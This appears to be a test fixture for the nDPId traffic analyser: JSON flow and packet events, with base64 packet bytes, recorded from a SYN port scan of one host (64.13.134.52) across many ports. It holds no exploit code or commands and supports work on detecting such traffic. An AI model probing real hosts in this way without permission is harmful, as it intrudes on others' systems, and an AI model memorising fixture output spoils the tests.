+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"synscan.pcap","alias":"nDPId-test","flow_id":355,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAs2BIAADkGN2CsEAAIQA2GNIzSB9HdUoMYAAAAAGACCAAovgAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":362,"source":"synscan.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058780,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"synscan.pcap","alias":"nDPId-test","flow_id":356,"flow_packet_id":1,"flow_last_seen":1278275058780,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058780,"pkt":"ACYLMQczACWzv5HuCABFAAAsipYAACcGltysEAAIQA2GNIzSFf\/dUoMYAAAAAGACEAASkAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":363,"source":"synscan.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058781,"flow_last_seen":1278275058781,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058781,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3827,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"synscan.pcap","alias":"nDPId-test","flow_id":357,"flow_packet_id":1,"flow_last_seen":1278275058781,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058781,"pkt":"ACYLMQczACWzv5HuCABFAAAs7gYAACcGM2ysEAAIQA2GNIzSDvPdUoMYAAAAAGACEAAZnAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":364,"source":"synscan.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058781,"flow_last_seen":1278275058781,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058781,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3809,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"synscan.pcap","alias":"nDPId-test","flow_id":358,"flow_packet_id":1,"flow_last_seen":1278275058781,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058781,"pkt":"ACYLMQczACWzv5HuCABFAAAssBUAADsGXV2sEAAIQA2GNIzSDuHdUoMYAAAAAGACEAAZrgAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":365,"source":"synscan.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5963,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"synscan.pcap","alias":"nDPId-test","flow_id":359,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAsB84AADoGBqWsEAAIQA2GNIzTF0vdU4MZAAAAAGACDAAVQQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":366,"source":"synscan.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":366,"source":"synscan.pcap","alias":"nDPId-test","flow_id":360,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAs9uYAADUGHIysEAAIQA2GNIzTTv7dU4MZAAAAAGACCADhjQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":367,"source":"synscan.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":48080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":367,"source":"synscan.pcap","alias":"nDPId-test","flow_id":361,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAsaisAAC8Gr0esEAAIQA2GNIzTu9DdU4MZAAAAAGACEABsuwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":368,"source":"synscan.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2020,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":368,"source":"synscan.pcap","alias":"nDPId-test","flow_id":362,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAsoicAADgGbkusEAAIQA2GNIzTB+TdU4MZAAAAAGACBAAsqAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":369,"source":"synscan.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":369,"source":"synscan.pcap","alias":"nDPId-test","flow_id":363,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAs5qoAADYGK8isEAAIQA2GNIzTE9jdU4MZAAAAAGACDAAYtAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":370,"source":"synscan.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5221,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":370,"source":"synscan.pcap","alias":"nDPId-test","flow_id":364,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAsswIAACsGanCsEAAIQA2GNIzTFGXdU4MZAAAAAGACEAAUJwAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":371,"source":"synscan.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3737,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"synscan.pcap","alias":"nDPId-test","flow_id":365,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAs+xQAACsGIl6sEAAIQA2GNIzTDpndU4MZAAAAAGACEAAZ8wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":372,"source":"synscan.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3493,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"synscan.pcap","alias":"nDPId-test","flow_id":366,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAsrwkAAC8GammsEAAIQA2GNIzTDaXdU4MZAAAAAGACEAAa5wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":373,"source":"synscan.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"synscan.pcap","alias":"nDPId-test","flow_id":367,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAseJEAADcGmOGsEAAIQA2GNIzTD6bdU4MZAAAAAGACEAAY5gAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":374,"source":"synscan.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":52869,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"synscan.pcap","alias":"nDPId-test","flow_id":368,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAse3UAADsGkf2sEAAIQA2GNIzTzoXdU4MZAAAAAGACEABaBgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":375,"source":"synscan.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":375,"source":"synscan.pcap","alias":"nDPId-test","flow_id":369,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/eEAAC0GHZGsEAAIQA2GNIzTEyPdU4MZAAAAAGACCAAdaQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":376,"source":"synscan.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44501,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":376,"source":"synscan.pcap","alias":"nDPId-test","flow_id":370,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAsro4AACgGceSsEAAIQA2GNIzSrdXdUoMYAAAAAGACBACGuQAAAgQFtA=="} 
+00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":377,"source":"synscan.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":377,"source":"synscan.pcap","alias":"nDPId-test","flow_id":371,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAsChEAACcGF2KsEAAIQA2GNIzSAAndUoMYAAAAAGACEAAohgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":378,"source":"synscan.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":378,"source":"synscan.pcap","alias":"nDPId-test","flow_id":372,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAsd34AAC0Go\/SsEAAIQA2GNIzSBTDdUoMYAAAAAGACCAArXwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":379,"source":"synscan.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058845,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1166,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"synscan.pcap","alias":"nDPId-test","flow_id":373,"flow_packet_id":1,"flow_last_seen":1278275058845,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058845,"pkt":"ACYLMQczACWzv5HuCABFAAAsoIAAADgGb\/KsEAAIQA2GNIzSBI7dUoMYAAAAAGACBAAwAQAAAgQFtA=="} 
+00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":380,"source":"synscan.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":380,"source":"synscan.pcap","alias":"nDPId-test","flow_id":374,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAsEIwAACsGDOesEAAIQA2GNIzSD6XdUoMYAAAAAGACEAAY6gAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":381,"source":"synscan.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":381,"source":"synscan.pcap","alias":"nDPId-test","flow_id":375,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAsTAEAADYGxnGsEAAIQA2GNIzSFqjdUoMYAAAAAGACDAAV5wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":382,"source":"synscan.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":382,"source":"synscan.pcap","alias":"nDPId-test","flow_id":376,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAsnkwAAC0GfSasEAAIQA2GNIzSBBDdUoMYAAAAAGACCAAsfwAAAgQFtA=="} 
+00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":383,"source":"synscan.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":99,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":383,"source":"synscan.pcap","alias":"nDPId-test","flow_id":377,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAsFfcAACcGC3ysEAAIQA2GNIzSAGPdUoMYAAAAAGACEAAoLAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":384,"source":"synscan.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5440,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"synscan.pcap","alias":"nDPId-test","flow_id":378,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAsSqoAACYG18isEAAIQA2GNIzSFUDdUoMYAAAAAGACDAAXTwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":385,"source":"synscan.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27356,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"synscan.pcap","alias":"nDPId-test","flow_id":379,"flow_packet_id":1,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058846,"pkt":"ACYLMQczACWzv5HuCABFAAAsviQAACgGYk6sEAAIQA2GNIzSatzdUoMYAAAAAGACBADJsgAAAgQFtA=="} 
